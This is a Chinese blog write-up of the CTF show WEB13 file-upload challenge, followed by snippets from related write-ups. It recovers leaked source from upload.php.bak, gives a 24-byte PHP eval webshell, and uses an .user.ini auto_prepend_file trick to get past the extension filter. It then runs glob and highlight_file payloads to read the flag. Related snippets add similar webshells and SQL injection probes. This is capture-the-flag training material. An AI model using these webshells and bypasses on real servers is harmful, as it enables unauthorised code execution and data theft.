CTF show WEB13

最新推荐文章于 2025-03-24 18:02:04 发布
最新推荐文章于 2025-03-24 18:02:04 发布
阅读量5.3k 收藏 9
点赞数 9
分类专栏: CTF show WEB系列 文章标签: php python shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/miuzzx/article/details/104379595
版权
本文介绍了一个CTF挑战中的文件上传题目,通过源码泄露找到上传脚本的限制条件,利用特殊的文件上传技巧绕过后缀和大小限制,最终通过.user.ini配置实现文件包含攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目地址:http://ctf.show

进入题目是个文件上传的题目,尝试了一番文件上传漏洞利用的方法后,没有啥突破,可能有啥隐藏的目录,尝试源码泄露利用的方法,在输入upload.php.bak时成功下载下来源码。
.bak文件是备份文件。
这里列举一下常见的源码泄露
.hg源码泄漏 .git源码泄漏 .DS_Store文件泄漏,还有以.phps .bak结尾的网页
在web题没有头绪的时候可以尝试可能会有奇效。
源码如下:

<?php 
	header("content-type:text/html;charset=utf-8");
	$filename = $_FILES['file']['name'];
	$temp_name = $_FILES['file']['tmp_name'];
	$size = $_FILES['file']['size'];
	$error = $_FILES['file']['error'];
	$arr = pathinfo($filename);
	$ext_suffix = $arr['extension'];
	if ($size > 24){
		die("error file zise");
	}
	if (strlen($filename)>9){
		die("error file name");
	}
	if(strlen($ext_suffix)>3){
		die("error suffix");
	}
	if(preg_match("/php/i",$ext_suffix)){
		die("error suffix");
    }
    if(preg_match("/php/i"),$filename)){
        die("error file name");
    }
	if (move_uploaded_file($temp_name, './'.$filename)){
		echo "文件上传成功!";
	}else{
		echo "文件上传失败!";
	}

 ?>

我们发现了上传文件的要求,文件的大小要小于等于24,名字长度小于等于9,后缀长度小于等于3,并且最要命的是后缀和名字都不能包含php。我们肯定是要上传一句话木马的,既然小于等于24可以这样写<?php eval($_POST['a']);正好24字节可以满足,但是由于后缀问题服务器无法解析该php语句。这里用一种特殊的手法来绕过。
1.我们先将一句话保存为a.txt。
2.上传a.txt
3上传.user.ini文件。
对于php中的.user.ini有如下解释:
PHP 会在每个目录下搜寻的文件名;如果设定为空字符串则 PHP 不会搜寻。也就是在.user.ini中如果设置了文件名,那么任意一个页面都会将该文件中的内容包含进去。
我们在.user.ini中输入auto_prepend_file =a.txt,这样在该目录下的所有文件都会包含a.txt的内容、
4.菜刀连接
菜刀连接上之后我们发现没有对文件操作的权限,所以我们直接在网页上查找flag。
a=print_r(glob("*"));
在这里插入图片描述
接着输入 a=highlight_file("903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php ");
在这里插入图片描述

ctfshow web13 文件上传.user.ini
m0_46412682的博客
07-16 2297
ctfshow web13 文件上传 开始的页面 先上传一张正常的照片,显示error file size,这张图片是886k,再上传一张小的照片还是error file size 不管先,上传一句话木马1.php,提示错误,应该是过滤了后缀名 现在上传1.txt,内容为<?php eval($_GET[‘w’]);?>,还是文件大小问题 内容改小一点<?php eval($_GET[w]); 这里我们实现能不能上传.htaccess文件,这里是上传不了 之前再buuctf中有道也是文件
CTF show web4
qq_43039823的博客
07-22 1060
这个题长得跟web3很相似,但是实际上内容不同,得到flag的姿势也是各不相同。 打开题目界面,依旧是老样子,上边光秃秃的就一句include ....结合上题目的知识很清晰的判断出是文件包含漏洞。“PHP:include(), include_once(), require(), require_once()等 老姿势 , url=/etc/passwd 依旧能读出用户的属性,文件包含确认! 尝试着跟上一个题目的思路一样,打开burp 加上一句<?php system("ls")?&g...
CTF.showweb13
qq_46230755的博客
01-15 2434
扫描后发现存在upload.php.bak .bak文件是备份文件。 这里列举一下常见的源码泄露 .hg源码泄漏 .git源码泄漏 .DS_Store文件泄漏 .phps .bak结尾的网页 <?php header("content-type:text/html;charset=utf-8"); $filename = $_FILES['file']['name']; $temp_name = $_FILES['file']['tmp_name']; $size = $_FILES.
ctfshow WEB web3
最新发布
weixin_68416970的博客
03-24 382
ctfshow WEB web3
ctf.show-web13
2301_79210256的博客
10-07 666
先上传.user.ini文件中的内容, 文件中内容是auto_prepend_file=1.txt。函数这行代码时,它会打印出当前目录下所有文件和目录的列表。auto_prepend_file将文件内容包含在每个脚本执行之前执行。auto_append_file将文件内容包含在每个脚本执行之后之后。.user.ini文件是一个可选的配置文件,它允许开发者和用户在不修改主。函数用于显示一个文件的内容,同时对 PHP 代码进行语法高亮。文件的情况下自定义 PHP 设置,可以覆盖或添加全局。
ctfshow web13
2302_76724233的博客
09-07 1302
打开网站初步判定为文件上传漏洞。随便选择几个文件上传,提示错误不选择任何文件直接点提交也会报错打开burpsuite抓包,改掉MIME类型,也就是图示位置,发现也不行,应该不是MIME过滤一头雾水,只能换个思路。------------------------------------------------------这是分割线------------------------------------------------------------通过备份压缩文件获取,常见的文件后缀名有以下这些。
ctfshow-萌新-web13( 利用代码执行漏洞获取网站敏感文件)
热门推荐
wangyuxiang946的博客
09-11 1万+
ctf.show萌新模块 web13关, 这一关的考点是代码执行漏洞, 需要灵活的运用各种命令执行函数, 源码中过滤了system, exec, highlight函数, cat命令, congfig, php, 点和分号等关键字, 推荐使用反引号`` 进行绕过 页面中展示了部分源码, 并提示 flag 就在 config.php 文件中 源码中过滤了参数中的 system exec highlight cat . ; file php config 等关键字, 这里可以使用 pass...
CTFshow-web-web13
qq_68581192的博客
10-27 630
user.ini中两个中的配置就是auto_prepend_file和auto_append_file。这两个配置的意思就是:我们指定一个文件(如1.jpg),那么该文件就会被包含在要执行的php文件中(如index.php),相当于在index.php中插入一句:require(./1.jpg)。由于后缀问题服务器无法解析该php语句,我们先上传a.txt,再上传.user.ini文件。先尝试在url后添加/upload.php.bak,发现直接下载了,我们打开下载的。.DS_Store文件泄漏。
ctf.show_web2解题过程
qq_38634097的博客
05-24 678
打开场景看到的是登录框,输入弱口令admin/admin、admin/123456等无结果。我们已知,mysql5.0以上版本有infomation_schema,所以此处可以利用内置的数据库查询。得到flag:ctfshow{4db0befe-fc42-4b6f-8faf-f4b81f94fb82}构造poc:1’ or 1=1 # 进行登录,得到以下结果。1’ or 1=1 order by 4 # 登录失败。1’ or 1=1 order by 3 # 登录成功。得到第一列为flqg,
ctf_show笔记篇(web入门---文件上传)
whale_waves的博客
03-06 1002
这里利用.user.ini文件,只要访问同目录下的php文件就能把目标png文件当作php文件加载。可以直接写payload获得flag,不用在继续$_POST之类的。自行搜索绕过一下其他的和153题无异。这里就关系到了网站中间件的设置问题。使用GIF89a在文件最上方添加。但是会验证图片头信息。
ctf_show笔记篇(web入门---信息收集)
whale_waves的博客
03-02 758
php探针是用php语言编写的一个程序,可以用来查看服务器的状态,比如服务器操作系统信息,服务器CPU、内存和硬盘的使用状况,php版本和组件信息,数据库版本信息,实时网速等。可以非常方便地了解服务器的运行状态雅黑php探针:url/tz.php可将这些写入目录扫描使用的字典里,可以跟方便的扫东西。
最新CTFShow web1-7——CTFWEB模块解题思路_ctfshow web题目解析
2401_84264727的博客
05-04 1289
这一关的重点在于注释, 由于开发人员的疏忽, 忘记删除注释中的敏感数据, 右键检查网页源码即可拿到 flag。
ctfshow web13-14
qq_61988806的博客
12-12 1188
ctfshow web13-14 文件上传的题 想办法搞到源码 常见得到源码的方法 .bak .git .hg 这里使用.bak得到源码 下载得到源码
CTF-show WEB入门--web13
m0_73912575的博客
01-03 584
CTF-show WEB入门--web13
ctf.show_web13
wangzhemvp的博客
04-16 395
在.usr.ini中如果设置了文件名,那么任意一个页面都会将该文件中的内容包含进去。在 .usr.ini 中输入 auto_prepend_file =a.txt,这样在该目录下的所有文件都会包含 a.txt 的内容。auto_prepend_file=a.txt // 意思是所有a.txt文件都以php文件方式打开。上传成功之后,但蚁剑这里连接不上,可能是.txt文件蚁剑无法通过php进行解析吧。要求文件大小少于24字节,文件名少于九个字节,后缀小于三个字节,并且。,文件名不能为php
CTFSHOW 萌新web13
weixin_44833249的博客
07-05 276
冒号这个过滤可以用?>来绕过,让程序运行到这里就终止,而在php中,最后一句话是不需要用分号;相比于12题 多了冒号:,点.file的匹配。
CTFSHOW系列-web13(信息收集-技术文档泄露)
SuperherRo的博客
11-27 672
CTFSHOW系列解题思路
CTFshow 信息收集 web13
Kradress的博客
10-23 375
根据提示 技术文档里面不要出现敏感信息,部署到生产环境后及时修改默认密码 查看源码,发现有几个可以访问的网页 仔细查看每个网页的源码后,在Products.html中发现 pdf文件 点开pdf文件,根据信息访问后台,输入账号密码,拿到flag ...
CTF_ctfshow_web13_文件上传漏洞
weixin_54227009的博客
05-14 1580
打开靶机发现是个文件上传漏洞,上传了图片这些,都提示太大了 10344c8d-1054-45ac-ac38-f99ae5d4e476.challenge.ctf.show/upload.php.bak 然后upload.php.bak下载下来了源码,进行审计: <?php header("content-type:text/html;charset=utf-8"); $filename = $_FILES['file']['name']; $temp_name = $_...
ctf show web入门163
03-22
### 关于CTF Web安全入门的相关知识 #### 什么是CTF中的Web安全? CTF(Capture The Flag)是一种网络安全竞赛形式,其中Web安全是一个重要的组成部分。它主要涉及对Web应用程序的安全测试和技术挑战。通过解决这些题目,参赛者可以学习到多种攻击技术以及防御措施。 #### 常见的CTF Web安全题型 在CTF比赛中,Web安全题目通常涵盖了多个方面,包括但不限于SQL注入、跨站脚本攻击(XSS)、文件包含漏洞、命令执行等[^1]。每种类型的题目都有其特定的技术背景和解决方案。 #### XSS攻击及其变体 XSS(Cross-Site Scripting),即跨站脚本攻击,是CTF中非常常见的一类问题。这种攻击允许恶意用户将代码嵌入其他用户的浏览器页面上运行。根据实现方式的不同,XSS分为存储型、反射型和DOM-based三种类型[^2]。对于此类题目,选手需要掌握如何构造有效的payload并绕过可能存在的防护机制。 #### 编码技巧的重要性 除了直接面对逻辑错误外,编码也是解决问题过程中不可忽视的一部分。例如ASCII编码、URL编码、HTML实体编码等多种转换手段经常被用来隐藏或者修改数据表现形式从而达到欺骗服务器的目的[^3]。理解它们的工作原理有助于更好地分析潜在漏洞所在之处。 #### HTTP请求处理 另一个重要概念就是正确理解和操作HTTP协议下的GET与POST方法的区别及应用场合。简单来说, GET主要用于获取资源而不会改变状态; POST则用于提交表单或者其他需引起副作用的操作[^4]. 掌握这两者的差异可以帮助我们更精准地定位某些基于参数传递而导致的功能异常点. ```python import requests url = 'http://example.com/login' data = {'username': 'admin', 'password': 'password'} response = requests.post(url, data=data) print(response.text) ``` 上述示例展示了如何利用Python库`requests`发起一次简单的POST请求登录尝试。 ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值